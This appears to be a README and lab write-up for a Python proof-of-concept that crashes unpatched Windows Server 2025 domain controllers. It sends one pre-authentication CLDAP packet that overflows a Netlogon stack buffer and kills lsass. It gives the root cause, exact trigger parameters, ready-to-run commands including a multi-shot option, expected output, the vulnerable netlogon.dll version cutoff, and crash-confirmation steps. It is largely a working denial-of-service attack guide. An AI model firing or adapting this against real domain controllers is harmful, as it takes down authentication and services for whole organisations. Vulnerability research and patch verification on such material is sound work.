
CVE-2026-41089 LongLogon: pre-auth CLDAP (UDP/389) stack buffer overflow crasher for unpatched Windows Server 2025 Netlogon (lsass 0xc0000409). Stdlib-only Python PoC + lab write-up.
Pre-authentication stack buffer overflow in the Netlogon service of Windows Server 2025. A single CLDAP packet (UDP/389) from any host on the wire is enough: lsass.exe dies with STATUS_STACK_BUFFER_OVERRUN (0xc0000409) and the domain controller reboots.
The response to a Netlogon CLDAP ping is serialized into a 528-byte stack buffer. The server writes its own names (forest, domain, hostname) followed by the attacker-controlled User field (capped at 130 wide chars). When the total fill reaches 536 bytes (buffer + stack cookie), the trailing L'\0' overwrites the /GS cookie and the process crashes.
The NtVer field routes the code path: 0x02 takes the vulnerable BuildSamLogonResponse, while 0x06 / 0x16 take the bounded (safe) BuildSamLogonResponseEx. This PoC sends NtVer = 0x02.
python3 longlogon_exploit.py <dc-ip> <dc-dns-domain> [--dry-run] [--shots N] [--confirm-wait S] [--force]
--dry-run probe with User=1 (benign), show projected fill, do not fire --shots N number of overflow packets to send (default 1) --confirm-wait S wait before re-probing after a silent shot (default 75s) --force fire even if the projected fill is under 536 bytes
Example (replace the IP and the domain with your lab values):
python3 longlogon_exploit.py 192.168.1.10 cve202641089.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.example --dry-run
python3 longlogon_exploit.py 192.168.1.10 cve202641089.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.example
Expected output of the fire:
[*] CVE-2026-41089 LongLogon crasher -> 192.168.1.10 (domain 64 chars)
[*] DC alive. Probe fill (User=1) = 323 B; projected fill (User=130) = 581 B (buffer 528, cookie 536)
[*] Firing overflow: NtVer=0x02, User=130 chars, shots=1
shot #1: NO REPLY (5.01 s) -> possible crash (or lost packet)
[*] Waiting 75 s to let the DC (re)start, then re-probing...
[+] DC STILL DOWN after overflow + re-probe -> CRASH LIKELY (reboot in progress or dump pending)
Exit codes: 0 crash likely, 1 DC silent on the initial probe, 2 fill under 536 bytes (borderline), 3 DC survived.
Note: the script re-probes after 75 seconds because a single silent packet can also be a lost UDP datagram. Do not conclude a crash from silence alone.
Use the official checker from the research repo. It probes with User=1, so the DC stays up:
git clone https://github.com/ADScanPro/CVE-2026-41089-LongLogon && cd CVE-2026-41089-LongLogon
python3 run longlogon.py <dc-ip> <dc-dns-domain>
Expected: "PRECONDITION MET" with a projected fill of at least 536 bytes.
The checker does not prove the patch state: a patched DC takes the same code path and simply refuses the over-long write. Check the netlogon.dll version on the DC directly (< 10.0.26100.32772 = vulnerable).
On the DC, once it is back up:
(Get-CimInstance Win32_OperatingSystem).LastBootUpTime
Get-WinEvent -FilterHashtable @{LogName='Application'; Id=1000} -MaxEvents 5
Look for event 1000: faulting application lsass.exe, faulting module netlogon.DLL, exception code 0xc0000409, and a boot time later than the shot.
Tested on Windows Server 2025, lsass.exe 10.0.26100.7309, netlogon.dll 10.0.26100.32230 (unpatched), 64-char domain + 63-char hostname (projected fill 581 bytes). One packet fired:
Application Error (Id 1000):
Faulting application: lsass.exe, version: 10.0.26100.7309
Faulting module: netlogon.DLL, version: 10.0.26100.32230
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)
Fault offset: 0x000000000002399d
LastBootUpTime: 17:19:42 (crash logged at 17:18:37)
This PoC is provided for educational and research purposes only. It was developed and tested in an isolated lab environment on Windows Server 2025. Use it at your own risk.
By using this script you agree that the author is not liable for any loss of data, service interruption, hardware damage, or other direct or indirect consequences. The crash is non-idempotent: the target domain controller will reboot. Take a snapshot before firing.
No warranty is made that this PoC works in a production environment or on all builds of Windows Server 2025.